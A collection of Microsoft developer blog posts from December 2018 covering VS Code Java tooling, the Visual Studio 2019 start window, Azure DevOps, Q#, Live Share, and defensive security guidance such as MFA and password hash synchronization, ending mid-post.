Visual Studio Code Updates for Java Developers: Rename, Logpoints, TestNG and More

December 14th, 2018

As we seek to continually improve the Visual Studio Code experience for Java developers, we’d like to share a couple of new features we’ve just released. Thanks to your great feedback over the year, we’re heading into the holidays with great new features we hope you’ll love. Here’s to a great 2019!


Rename refactoring

With the new release of the Eclipse JDT Language Server, we’re removing the friction some developers experienced in ensuring that renamed Java classes propagate to the underlying files in Visual Studio Code. With the update, when a symbol is renamed, the corresponding source file on disk is automatically renamed along with all the references.


Logpoints

VS Code logpoints are now supported in the Java Debugger. Logpoints allow you to inspect state and send output to the Debug Console without changing the source code or explicitly adding logging statements. Unlike breakpoints, logpoints don’t stop the execution flow of your application.
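
To illustrate, here’s a minimal, hypothetical class (the names below are ours, not from the release): run it under the Java Debugger and set a logpoint on the marked line with a message such as `sum is {sum}`; each loop iteration then logs to the Debug Console without pausing execution.

```java
// Hypothetical demo class for trying out logpoints in VS Code.
// Right-click the editor gutter on the marked line and add a logpoint
// with a message like: sum is {sum}
public class LogpointDemo {
    public static void main(String[] args) {
        int sum = 0;
        for (int i = 1; i <= 5; i++) {
            sum += i; // <-- logpoint here: logs each pass, never stops
        }
        System.out.println("final sum = " + sum); // prints: final sum = 15
    }
}
```

Expressions in curly braces inside the logpoint message are evaluated in the current debug scope, so no temporary `println` calls ever need to be committed.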

To make debugging even easier, you can now skip editing the “launch.json” file by either clicking the CodeLens on top of the “main” function or using the F5 shortcut to debug the current file in Visual Studio Code.

TestNG support

TestNG support was added in the newest version of the Java Test Runner. With the new release, we’ve also updated the UIs of the test explorer and the test report. See how you can work with TestNG in Visual Studio Code.
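
As a sketch of what the Test Runner can now discover, here is a small data-driven TestNG test. The class, helper, and data values below are hypothetical examples of ours and assume TestNG is on the project’s test classpath:

```java
import org.testng.Assert;
import org.testng.annotations.DataProvider;
import org.testng.annotations.Test;

public class ReverseTest {

    // Plain helper under test
    static String reverse(String s) {
        return new StringBuilder(s).reverse().toString();
    }

    // Supplies one row of arguments per test invocation
    @DataProvider(name = "samples")
    public Object[][] samples() {
        return new Object[][] { { "abc", "cba" }, { "noon", "noon" } };
    }

    // The Test Runner runs this once per data row
    @Test(dataProvider = "samples")
    public void reversesStrings(String input, String expected) {
        Assert.assertEquals(reverse(input), expected);
    }
}
```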

We’ve also enhanced our JUnit 5 support with new annotations, such as @DisplayName and @ParameterizedTest.
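
For example, the two annotations can be combined like this (a hypothetical test class of ours, assuming JUnit 5 is on the test classpath):

```java
import org.junit.jupiter.api.DisplayName;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.ValueSource;
import static org.junit.jupiter.api.Assertions.assertTrue;

class PalindromeTest {

    // Plain helper under test
    static boolean isPalindrome(String s) {
        return new StringBuilder(s).reverse().toString().equals(s);
    }

    // @DisplayName gives the test a readable name in the test explorer;
    // @ParameterizedTest runs the method once per @ValueSource entry
    @DisplayName("Palindromes should be detected")
    @ParameterizedTest
    @ValueSource(strings = { "racecar", "level", "noon" })
    void detectsPalindromes(String candidate) {
        assertTrue(isPalindrome(candidate));
    }
}
```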

Another notable improvement in the Test Runner is that we’re no longer loading all test cases during startup. Instead, loading now only happens when necessary, e.g. when you expand a project to see the test classes in the Test viewlet. This should reduce the resources needed in your environment and improve the overall performance of the tool.

Updated Java Extension Pack

We’ve included the recently released Java Dependency Viewer in the Java Extension Pack, as more and more developers are asking for the package view, dependency management, and project creation capabilities provided by this extension. The viewer also provides a hierarchy view of the package structure.

Additional language support – Chinese

As the user base of Java developers using Visual Studio Code expands around the world, we decided to make our tool even easier to use internationally by offering translated UI elements. Chinese localization is now available for the Maven and Debugger extensions, and it will soon be available for other extensions as well. We’d also like to welcome localization contributions from the community.

IntelliCode and Live Share

During last week’s Microsoft Connect() event, we shared updates on the popular Visual Studio Live Share and Visual Studio IntelliCode features. These new IDE capabilities, all of which support Java, boost your productivity with enhanced collaboration and coding experiences that you can try now in Visual Studio Code.

Just download the extensions for Live Share and IntelliCode to experience those new features with your friends and co-workers. Happy coding and happy collaborating!

Attach missing sources

When you navigate to a class in some libraries without source code, you can now attach the missing source zip/jar using the context menu “Attach Source”.

We love your feedback

Your feedback and suggestions are especially important to us and will help shape our products in the future. Please help us by taking this survey to share your thoughts!

Try it out

Please don’t hesitate to try Visual Studio Code for your Java development and let us know your thoughts! Visual Studio Code is a lightweight and performant code editor and our goal is to make it great for the entire Java community.

Xiaokai He, Program Manager
@XiaokaiHe

Xiaokai is a program manager working on Java tools and services. He’s currently focusing on making Visual Studio Code great for Java developers, as well as supporting Java in various Azure services.


Get to code: How we designed the new Visual Studio start window

December 13th, 2018

By now, many of you may have noticed a very prominent change to the launch of Visual Studio in Visual Studio 2019 Preview 1. Our goal with this new experience is to provide rapid access to the most common ways that developers get to their code: whether it’s cloning from an online repository or opening an existing project.

New start window in Visual Studio 2019

A month ago, we shared a sneak peek of the experience (in the blog post A preview of UX and UI changes) and mentioned the research and observation that we used as input into the design and development. This is the story about how we got there.

How & why we began this journey

Two years ago, we reinvented the Visual Studio installation experience to offer developers the ability to install exactly what they need and reduce the installation footprint of Visual Studio. We broke Visual Studio down into smaller packages and components and then grouped them together into development-focused workloads (which are bundles of packages and components). We quickly realized that the installation was just one piece of the journey our users take when they are getting started with Visual Studio.

We began to think more broadly – beyond just the installation of the bits, to explore the developer journey of getting to code. This journey starts from the moment you think about that great idea for an app all the way to writing your first lines of code, and integrating Visual Studio into your daily routine. To help us understand what developers were doing throughout their first launch, we built a data-informed model of the customer journey.

Our Visual Studio Customer Journey

These insights helped improve installation success rates and address common failures, but they couldn’t answer questions like: why do some users drop off from one step to the next, and how do we make sure Visual Studio meets the needs of millions of developers? Some of you may even be trying to better understand how to make your own consumer or business customers more successful with your products.

So, from there we turned to existing mechanisms like surveys, interviews, social media (blogs), and A/B experimentation to help us understand where and how to improve these experiences. The surveys received an overwhelming number of responses (thank you to those of you who contributed!) and provided us with a foundation of anecdotes that helped us understand our individual users even more. They helped us recognize the different types of users coming into our “front door”, which is to say the first place they learn about Visual Studio and decide to download it. We identified through early cohort analysis that almost half (50%) of users downloading were brand new to Visual Studio (but not necessarily new to coding), and only some of those users came back to Visual Studio a second time. This was a surprising moment for us as we had no idea why this was happening!

Going beyond the data

We knew we needed deeper insights into how we could help new users be successful with their first time in Visual Studio and assist them in making the best choices along their journey. Fundamentally, we wanted to identify what the “Magic Moment” would be for them in Visual Studio. The “Magic Moment” is a phrase commonly used by product teams that maps a set of events or an experience a user has with a product that transforms them from a casual user trying something out to an avid, loyal user who finds success and even promotes the product. This moment is at the very core of identifying patterns to indicate users who will integrate a product or tool into their daily routine. We didn’t know what our Magic Moment was just yet, but we had a lot of ideas on what we believed it might be, so we asked ourselves:

Is there something new Visual Studio users do in the IDE that indicates they will return or abandon after 5 minutes?

We set out to answer this question by:

  1. Observing developers, both brand new to Visual Studio and seasoned, as they find Visual Studio to download, configure, and start writing code.
  2. Identifying the problems that they encountered throughout their journey to code.
  3. Building hypotheses and concepts around getting to a “Magic Moment.”
  4. Validating the hypotheses and concepts via an iterative process of weekly testing and experimentation.

Our iterative process from interns to external users

We started by asking our summer interns to install and use Visual Studio for the first time in our user experience (UX) lab and document their journey. We were surprised at how long and difficult the journey from download to writing and running code was for them. We also gained insights into their expectations for Visual Studio based on other editors and IDEs they had previous experience with.

Our first step was simple: we gave participants a clean virtual machine with only Windows 10 installed and asked them to find, install, and use Visual Studio, and to “do whatever is natural to you to get started.”

We then just watched…

One of our participants in the User Experience lab

It turns out even students think the 40-year-old concept of writing a “hello world” app is a great starting place. What also became extremely clear to us was the moment when users were writing and running code: we saw them become more engaged with Visual Studio and have fun. We saw an emotional change when they wrote their own code, compiled it, fixed some things, and ran it. We had a strong inkling that we were getting even closer to the “Magic Moment.”

We then scaled up our research to bring in more new and experienced developers every week. We tested out many ideas using low fidelity mockups built in PowerPoint and eventually moved to higher fidelity prototypes. We tried variations of tasks and UIs as we tested our assumptions. There were multiple problems to solve but one of the most significant became clear when we saw new Visual Studio developers struggle when trying to open code or create a new project. The first view of Visual Studio was overwhelming with no clear guidance of what they should do first. So, we set out to focus on that stage of the journey in our designs and storyboards for Visual Studio 2019. The design process looked a little something like this:

Visualizing the friction points in the customer journey

Evolution of our start window designs

Bringing all our insights into Visual Studio 2019

From all the design explorations, experiments, and observations evolved the idea of a start window that would offer a focused experience to quickly get you writing those first lines of code. Given our insights, we wanted to ensure users, especially those new to Visual Studio (some already experienced in other development tools), could quickly experience that “Magic Moment” of writing their first lines of code and successfully running it every time.

The start window would support new Visual Studio users by:

  1. Highlighting the choices they must make during the early, crucial steps of getting started with Visual Studio.
  2. Removing distractions and providing suggestions for the best path forward.
  3. Enabling a search and filter focused experience for creating a new project.
  4. Promoting a streamlined online repository-first workflow.

Developers who are already well-versed and experienced with Visual Studio might be wondering what’s in it for them. What we’ve heard from experienced developers is that onboarding junior developers is very challenging, so we believe the new start window is a step towards ensuring they are more successful in getting to their code each time they open the IDE. We will also continue to preserve and enable existing workflows in the start window to support the muscle memory that experienced users have established with Visual Studio. Lastly, seasoned developers in the user experience lab were delighted by the new “Clone and check out code” experience which brings your online repositories right to your fingertips on launch.

Anatomy of the start window

We know the list of recent projects and solutions is one of the most common ways developers open code, so it was very important that we maintain this list in the most prominent part of the start window. We also knew it was VERY important to not break existing flows where developers open projects/solutions from the desktop (by double-clicking) – so the start window will never show in this flow, as your code will always take priority and open immediately.

Bringing a more focused, source-first clone and check out code experience (like the Start Page had) to the forefront of Visual Studio was an opportunity to show new users the power of source providers like GitHub and Azure DevOps. We have also heard from our research with developers that this action is a prominent part of their daily workflow.

Opening a project or solution brings forward the concept of Visual Studio project and solution files that you can click on to open your entire codebase if you have an MSBuild-based solution. But if you use a non-MSBuild build system, such as CMake, then we would recommend opening a local folder instead. We’ve been investing in support to allow you to browse, edit, build, and debug any code without a .sln or project file. You can learn more about Open Folder, including how to configure a different build system to work with it, in our documentation. In addition, if you want to browse loose files in Visual Studio, you can just open the containing folder and pick up the file from the folder view of Solution Explorer.

Creating a new project is a big part of getting to your code in Visual Studio even when it’s prototyping some throwaway code in a simple template (like the Console App) or trying out the capabilities of a new platform or language for the first time. Based on the workloads you install, you’ll always see the most commonly used templates first. We’ve observed that developers first think about the kind of application they want to build (a mobile app, a website, etc.) and not the language – so we removed the language centric tree hierarchy and have improved searching and filtering to help you get to the right template more quickly. You’ll also find a more prominent list of recently used templates so you can quickly get back to your favorite template with a single click.

Lastly, continue without code offers developers a one-time escape from the window for the times when a different action is needed to start work (like joining a Live Share collaboration session or attaching to a process). Alternatively, hitting the ESC key will also dismiss the window and immediately bring up the IDE. If there are other scenarios that you perform frequently and think should have a home on the start window (for example, attaching a debugger), please upvote or create a suggestion in our Developer Community.

What’s next for this experience

In just the week since releasing Visual Studio 2019 Preview 1, we’ve heard developers tell us the start window provides a “focused way to get to the most common things.” We’re already working on some of your feedback, such as support for Team Foundation Version Control and better scannability in the recent solutions/projects list.

The start window experience is just one part of the journey we’re on to continue to streamline the onboarding experience to Visual Studio. Our longer-term vision includes improvements like reducing the number of choices required to download and install and offering relevant samples and tutorials to assist when learning a new language or platform.

Tell us what you think

As you can tell from the journey we’ve taken to get here, your feedback is essential to making this experience better. We’d love to have you try it out for a few hours in your everyday work. If it still doesn’t work for you, you can revert to the previous Visual Studio ‘start’ behavior. Go to Tools > Options and search for ‘Preview Features’, which will allow you to configure this setting along with a few other preview features. Alternatively, you can find the option in Tools > Options | Environment | Startup.

Tools | Options settings for Preview Features

After you’ve experienced Visual Studio 2019 Preview 1, please help us make this the best Visual Studio yet by letting us know what you like or tell us what is not working well for you. And of course, if you run into any issues, please let us know by using the Report a Problem tool in Visual Studio. You can also head over to the Visual Studio Developer Community to track your issue or, even better, suggest a feature, ask questions, and find answers from other developers.

Cathy Sullivan, Principal Program Manager, Visual Studio Platform

Cathy Sullivan is a Principal Program Manager on the Visual Studio Acquisition team, focused on ensuring developers have a smooth onboarding experience the first time and every time with Visual Studio. She has worked on many Visual Studio Platform teams, building C#/VB language features and core UI/Shell features such as Solution Explorer, and designed the beloved dark theme used by many developers.

Categories: Visual Studio, Visual Studio 2019

New Azure DevOps Work Item Experience in Visual Studio 2019

December 12th, 2018

In previous versions of Visual Studio, the work item experience was centered around queries, which needed to be created and managed to find the right work items. In Visual Studio 2019, we have removed queries and added a new view for work items centered on the developer. This allows developers to quickly find the work they need and associate it with their pending changes, removing the need for queries.

For those users who use Visual Studio for work item planning and triage, we encourage you to do so from Azure Boards. Azure Boards is the central place to manage your backlog, triage work, and plan your sprints.

Be sure to read the full documentation on how to use the new Azure Boards work item experience in Visual Studio 2019.

Work Items Hub

The Work Items Hub in Visual Studio 2019 has many of the same views found in the Work Items Hub in Azure Boards. It is where developers can quickly find the work items that are important to them. Filters and views can provide specific lists of work items such as Assigned to Me, Following, Mentioned, and My Activity. From any of these views, you can do quick inline edits, assign work, create branches, and associate work with pending changes.

Create branches and relate work

Create a branch directly from a work item. This will automatically associate that work item with any current changes. Alternatively, you can relate a work item to a set of changes already in progress. You can associate as many work items with a commit as you would like.

#Mention in commit message

Search and select work items directly from the commit message. You can associate as many work items with the commit as you would like.

We need your help

We want to make the best experience for developers who use Azure Boards in Visual Studio. Please provide your feedback by sending us bugs and suggestions. You can contact us on Twitter at @danhellem or @AzureDevOps.

Dan Hellem, Program Manager, Azure DevOps

Dan is a Program Manager with Microsoft’s Azure DevOps on the Azure Boards team. Before coming to Microsoft in 2012, Dan spent his career building applications using Microsoft technologies and assembling Agile teams centered on delivering high quality software to users.

A Year of Q#

December 11th, 2018

The Quantum Architecture and Computation group launched Q#, our quantum computing programming language, a year ago on December 11th, 2017.

Q# 0.1 was the result of a lot of hard work from a small, dedicated team of developers, researchers, and program managers. We had made the decision to build a domain-specific language for quantum computing about six months before we launched, so we were on a very tight schedule. We were lucky to have a great team of people who all pitched in and did what needed to be done so that we could meet our extremely aggressive timetable.


Inside the team, we speculated on what level of interest Q# would attract. We hoped that we might receive a few hundred downloads, but we were blown away when we crossed 1,000 users about 9 hours after launch. That said, with so many users installing the Quantum Development Kit and trying to write simple programs in it, bugs started popping up. In order to deliver the best experience for our users, we released a patch in January that addressed issues like floating-point literals being handled incorrectly in certain locales, and allowed the simulator to run on older machines without vector instruction support.

We also addressed portability feature requests in our 0.2 release in February 2018, which saw us move from the .NET Framework to the open-source, cross-platform .NET Core. This allowed us to easily support macOS and Linux as well as Windows for building and running Q# code. We also added support for VS Code on all platforms (the 0.1 release was limited to Visual Studio on Windows). As part of the 0.2 release, we were able to make the majority of our libraries and samples available under an MIT license.

Long Hot Summer

We decided to take advantage of one of our team members’ expertise in organizing coding competitions and run a Q# coding competition to engage non-quantum developers with Q# and quantum computing. After a couple of months of preparation, we ran the Q# Coding Contest in early July. Again, the results exceeded our expectations: 514 participants in the warmup round, and 389 in the actual contest. 100 participants solved all the problems, and a lot of them even asked for more challenging ones!

To help make Q# and quantum computing more accessible to the public, we also launched self-paced programming tutorials: the Quantum Katas. We’re up to 10 katas already, and more are coming!

Spring, Summer, Autumn

We started planning the next major release in the spring of 2018, after shipping our 0.2 release: we wanted to rebuild our compiler to work as a language server, to give Q# developers the same interactive error checking and IntelliSense features they’re used to for languages like C# and F#. We knew this would be a huge amount of work and would require a significant re-architecture of the compiler in order to work incrementally. We didn’t want to wait longer to do this work, though, because we wanted to give our users the kind of modern programming environment they’re used to.

We spent the spring and summer re-architecting and rewriting the Q# compiler and shipped the new Q# compiler as our 0.3 release at the end of October.

The 0.3 release also includes a new, open source quantum chemistry library. This library integrates with NWChem, a powerful and popular open source computational chemistry package. The integration is based on the open source Broombridge schema.

Whatever Next

What’s next for Q#? No spoilers (yet!).

The last blog post of the calendar, scheduled for December 24th, will look at some of the things we’re considering for Q# in the coming year.

Until then, enjoy the holidays!

Congratulations to everyone who can figure out what the section titles have in common…

Alan Geller, Software Architect, Quantum Software and Applications

Alan Geller is a software architect in the Quantum Architectures and Computation group at Microsoft. He is responsible for the overall software architecture for Q# and the Microsoft Quantum Development Kit, as well as other aspects of the Microsoft Quantum software program.

Categories: Q#, Quantum, Visual Studio

New Benefits in Visual Studio Subscriptions

December 11th, 2018

Last week at Microsoft Connect();, we announced two new benefits to assist cloud migration for our users who have Visual Studio Subscriptions. If you missed the event or want to watch the on-demand trainings, check out the Connect(); event page. If you’re a current Visual Studio subscriber, activate your new benefits to get started right away. To learn more about our developer subscriptions and programs visit the Visual Studio website.

Here are more details on the two new benefits:

CAST Highlight

Developers need critical insights on their software when migrating to the cloud. With CAST Highlight, Visual Studio Enterprise subscribers can rapidly scan their application source code to identify the cloud readiness of their applications for migration to Microsoft Azure and monitor progress of their app both during and after a migration. Check out this video from CAST to see it in action.

Visual Studio Enterprise subscribers can get a free, full-featured one-month subscription to CAST Highlight for up to five apps per subscriber.

UnifyCloud’s CloudPilot

Developers also need solutions that enable quick and easy app migration to the cloud. CloudPilot helps move apps to Microsoft Azure in a few easy steps, including identifying all required changes down to the line of code for successful migration to containers, virtual machines, App Service, Azure SQL, and SQL Managed Instance. See this video from UnifyCloud to learn more about CloudPilot.

Visual Studio Enterprise subscribers are eligible for two 90-day free licenses to the full-featured CloudPilot, while Visual Studio Professional subscribers can take advantage of one 30-day license to scan apps and databases of millions of lines of code in minutes.

Log into the Visual Studio Subscriptions portal today to get your new benefits.

Let us know what you want to see with the Visual Studio Subscriptions by sharing your feedback, suggestions, thoughts, and ideas in the comments below!

Lan Kaim, Director of Product Marketing

Lan is a Director on the Azure marketing team where she is responsible for the developer subscription business.

New Preview label for Visual Studio extensions

December 7th, 2018

Visual Studio extensions can now be marked with a Preview label, which is shown clearly on the Visual Studio Marketplace. This sets clear expectations for your customers that the version could contain issues while you actively develop new features. You can get feedback from your users earlier, test out new code changes to improve your extension, and continue to provide a stable version for users who may require it.

Determining the quality of an extension is today an exercise left to the user. If an extension isn’t recommended by a friend, coworker, or other trusted person, all we can do is look at the number of downloads, the star rating, and the reviews to decide whether we perceive the quality to be high enough to try out the extension.

The new preview label explicitly communicates some important details to the consumer about what to expect from the extension. It helps them understand that the extension may not be feature complete and may contain bugs. It can also communicate that feedback is welcome to improve the extension before the final release, when the preview label is removed.

If the version of your extension is less than one (e.g. v0.5), then it will likely benefit from adding the preview label.

Add the preview label

In your extension’s .vsixmanifest file, add the new <Preview> element to the <Metadata> node.

  <Metadata>
    <Identity Id="[guid]" Version="0.8" Language="en-US" Publisher="My name" />
    <DisplayName>Extension name</DisplayName>
    <Description>Extension description.</Description>
    <Preview>true</Preview>
  </Metadata>

Now upload your extension to the Visual Studio Marketplace to see the new preview label show up. If your extension isn’t uploaded but referenced by a link, then there is a checkbox you can check to add the preview label when you edit your linked extension on the Marketplace.

It’s important to note that the extension will not change behavior in any way due to the addition of the preview label.

Try it out

If you have any applicable extensions, use the preview label to better communicate the right expectations to your users and improve your chances of higher ratings.

Mads Kristensen, Senior Program Manager

Mads Kristensen is a senior program manager on the Visual Studio Extensibility team. He is passionate about extension authoring, and over the years, he’s written some of the most popular ones with millions of downloads.

CISO series: Strengthen your organizational immune system with cybersecurity hygiene

December 6th, 2018

One of the things I love about my job is the time I get to spend with security professionals, learning firsthand about the challenges of managing security strategy and implementation day to day. There are certain themes that come up over and over in these conversations. My colleague Ken Malcolmson and I discussed a few of them on the inaugural episode of the Microsoft CISO Spotlight Series: CISO Lessons Learned. Specifically, we talked about the challenges CISOs face migrating to the cloud and protecting your organization’s data. In this blog, I dig into one of the core concepts we talked about: practicing cybersecurity hygiene.

Hygiene means conditions or practices conducive to maintaining health. Cybersecurity hygiene is about maintaining cyberhealth by developing and implementing a set of tools, policies, and practices to increase your organization’s resiliency in the face of attacks and exploits. Healthy habits like drinking lots of water, walking every day, and eating a rainbow of vegetables build up the immune system, so our bodies can fight off viruses with minimal downtime. Most of the time we don’t even realize how powerful the protection of these behaviors is until that day deep in January when you look around your office and realize you are one of the only people who isn’t sick. That’s what cybersecurity hygiene does; it strengthens your organizational immune system. It’s a simple concept until you start thinking about the last time you resolved to start practicing healthy habits but were skipping the salad by day three, because big salads make your stomach bloat and you’d rather have a candy bar anyway.

Success starts with strategy

No matter where in the world I am, CSOs and CISOs tell me their days are filled with fire drills and crises that consume attention and resources but don’t help advance a strategic agenda. A little like that candy bar: drawing focus in the present but diverting energy from long-term goals. In the precious moments of downtime, when cyber executives can turn attention to long-term strategy and proactive security measures, it’s not uncommon to have those goals diverted in a different way: chasing the latest trend that the board is excited about, or having to react to a failure or a finding from a recent security assessment.

Consistent change changes systems

Our bodies are systems: when we eat more vegetables, our microbiome changes; it becomes easier to digest those veggies, and we can actually begin to crave them. But if you stock the pantry with candy instead of leafy greens, it’s hard to make a consistent change. For cyberhealth, you need a strategy that works with the strengths of your organization and mitigates its weaknesses. It’s a little like planning to be healthy. If you are social, it can help to enlist a friend in your exercise routine. If you work late, you can buy prepared, healthy food, so you aren’t as tempted to grab that candy bar after a long day.

To implement good security practices, take some time to understand your budget, your priorities, and your greatest vulnerabilities, and allocate your money appropriately. Create strategic cybersecurity targets and goals for the next one, three, and five years, and engage the C-Suite and board in the approvals. You will feel more empowered in conversations with the C-Suite when you have a good rationale and a solid plan. And when cybersecurity hygiene becomes a systemic part of the organization, the healthy system will start to crave it.

Practice good cybersecurity hygiene

Once you have a strategy, you are ready to institute some best practices. We recommend the following starting points to all our clients, big and small:

  • Back up data: Make sure you have a regular process to back up your data to a location separate from your production data and encrypt it in transit and at rest.
  • Implement identity management: A good identity and access management solution allows you to enable a single common identity across on-premises and cloud resources, with added safeguards to protect your most privileged accounts.
  • Deploy conditional access: Use conditional access to control access based on location, device, or other risk factors.
  • Use Multi-Factor Authentication: Multi-Factor Authentication works on its own or in conjunction with conditional access to verify that users trying to access your resources are who they say they are.
  • Patch regularly: A strategy for regularly patching and updating all of your software and hardware reduces the number of security vulnerabilities a hacker can exploit.
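Multi-Factor Authentication pairs a password with a second proof, most commonly a time-based one-time code. As an illustration of how such a code generator works (this is the generic RFC 6238 TOTP algorithm, not how any particular Microsoft service implements MFA), here is a minimal sketch in Python:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, for_time=None, digits=6, step=30):
    """RFC 6238 TOTP: HMAC-SHA1 over the current 30-second time step."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if for_time is None else for_time) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F  # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

A verifier simply compares the code the user enters with `totp(secret)` for the current time step (usually also accepting the adjacent steps to tolerate clock skew).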

Develop cybersecurity hygiene with industry security frameworks

Excited to build healthy cyber habits but not sure where to begin? The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great place to start. You can also download blueprints that will help you implement Microsoft Azure according to NIST standards.

The Center for Internet Security (CIS) is a non-profit organization that helps organizations protect themselves from cybercrime. Review the CIS Microsoft Azure Foundations Benchmark, which provides recommended steps to securely implement Azure.

Stay healthy, eat your cyber vegetables, and stay up to date by watching our Microsoft CISO Spotlight Series: CISO Lessons Learned, and your organization can build the resiliency to take on any threat.

The post CISO series: Strengthen your organizational immune system with cybersecurity hygiene appeared first on Microsoft Secure.


Visual Studio Live Share for real-time code reviews and interactive education

December 6th, 2018

Collaborating with your team using Visual Studio Live Share keeps getting easier! Since making Live Share available for public use at BUILD last May, we’ve heard so much great feedback from our users, which has helped guide us in continuing to build a tool that truly enables developers to collaborate in all the ways they need from the comfort of their favorite tools. Your feedback has pointed us toward new collaboration scenarios that we had not previously thought of (e.g. technical interviews and hackathons), as well as helped us prioritize some of the biggest feature requests and issues, like sharing multi-root workspaces, making it easier to visually interact with a Live Share session, and allowing guests to start a debugging session. We’ve come a long way, and we have so much more collaboration goodness to bring you! If you haven’t checked out Live Share yet, get started collaborating today!

Live Share + Visual Studio 2019

After installing the Visual Studio 2019 Preview, you’ll immediately notice a Live Share button in the top-right corner of your IDE. Starting with Visual Studio 2019, Live Share is now installed by default with most workloads, making it easier than ever to start collaborating with your teammates.

For a quick overview of how to get started with Live Share, we have a walkthrough for you to watch:

We’ve also been working to bring features that enable better Live Share support for Visual Studio users. For our public preview release, we announced universal language support for all languages and platforms. We’re happy to say we’ve continued to expand this capability and have recently added support for more languages, including C++, VB.NET, and Razor, with F# and Python on the way soon.

Additionally, one of the top feature requests from Visual Studio users of Live Share was enabling Solution View for guests. Now guests see the same project-based view of the codebase as the host, rather than a folder view, as if everyone were developing locally.

Real-time code reviews

Another big area of collaboration among teams comes when committing your code and conducting reviews. Live Share wants to further enhance that experience and offer new ways to work with your teammates.

When a host shares their code during a Live Share session, guests have access to the shared source control diffs. In both Visual Studio (with the Pull Requests for Visual Studio extension) and Visual Studio Code, guests can view the diffs to get context on what changes have been made before or during a session. This enables real-time code reviews in your tool of choice, and can even help resolve a merge conflict.

Another aspect of the reviewing experience is comments. For that, Live Share enables in-line commenting. While in a session, participants can add comments to code for others to see in real-time. You can use this for making notes about certain changes found in a shared diff or making a to-do list of things to accomplish during the collaboration session.

To further enhance your code review experience, and ensure you can use the tools you’re already familiar with, we’re excited to announce that GitLens has added support for Live Share! As a guest, you can visualize code authorship with Git blame annotations, navigate through line/file/repo history, and view diffs between arbitrary baselines (e.g., commits, branches, or tags).

Collaboration comes in so many different forms, so working with the extension ecosystem to holistically address the various ways developers work together is integral to Live Share. We’ve also partnered with third-party extensions to augment Live Share collaboration sessions with their additional capabilities, like auto-sharing servers created by Live Server, sharing Test Explorer results with guests, and letting guests execute code as it is written with Quokka.js.

Interactive Education

The primary goal of Visual Studio Live Share is to enable developers to collaborate with each other more easily, and education is a scenario we care deeply about. Whether you’re mentoring a developer on your team, or giving a lecture to a classroom, Live Share provides participants with an experience that is more engaging and truly personalized to everyone’s learning needs.

While Live Share was already applicable to education, we’ve specifically addressed several key feedback items to ensure it’s further optimized for the diverse needs of instructors and students everywhere.

Get Collaborating!

If you haven’t had a chance, give Visual Studio Live Share a try! The extension is available for download for Visual Studio 2017 and Visual Studio Code users. Additionally, it is available as a default install option in the new Visual Studio 2019 Preview.

For more information about using Live Share, please check out our docs! We’re so grateful for all the amazing feedback we’ve received from you, and we love hearing more. We talked about a few new use cases we’ve optimized for based on your feedback, and we’re so excited for all the new ways we can enhance how you collaborate. As always, feel free to send us your feedback by filing issues and feature requests on GitHub.

Happy Collaborating!

Jon Chu, Program Manager
@jonwchu

Jon is a Program Manager on the Visual Studio Live Share team bringing collaboration tools to developers, enabling them to tell their own unique stories. Prior to Live Share he’s worked on XAML tooling and NuGet.

Step 1. Identify users: top 10 actions to secure your environment

December 5th, 2018

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. We'll provide advice on activities such as setting up identity management through Active Directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundational step in your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access cloud resources, including Azure, Office 365, and Azure AD-integrated SaaS apps, using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and it gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.
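Conceptually, password hash synchronization never sends a clear-text password to the cloud: the existing on-premises hash is itself re-hashed with a per-user salt and a key-derivation function before it leaves the network. A rough sketch of that idea in Python (the salt length, iteration count, and encoding here are illustrative placeholders, not Azure AD Connect's exact algorithm):

```python
import hashlib
import os

def prepare_hash_for_sync(onprem_hash_hex, salt=None, iterations=1000):
    """Re-hash an existing on-premises password hash with a per-user salt
    before synchronizing it; the clear-text password is never transmitted."""
    salt = os.urandom(10) if salt is None else salt
    derived = hashlib.pbkdf2_hmac(
        "sha256", onprem_hash_hex.encode("utf-16-le"), salt, iterations)
    return salt.hex(), derived.hex()
```

Because only this salted derivation is stored in the cloud, the original on-premises hash cannot be recovered from the synchronized value.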

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Azure AD-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure AD Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticate users and connect to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

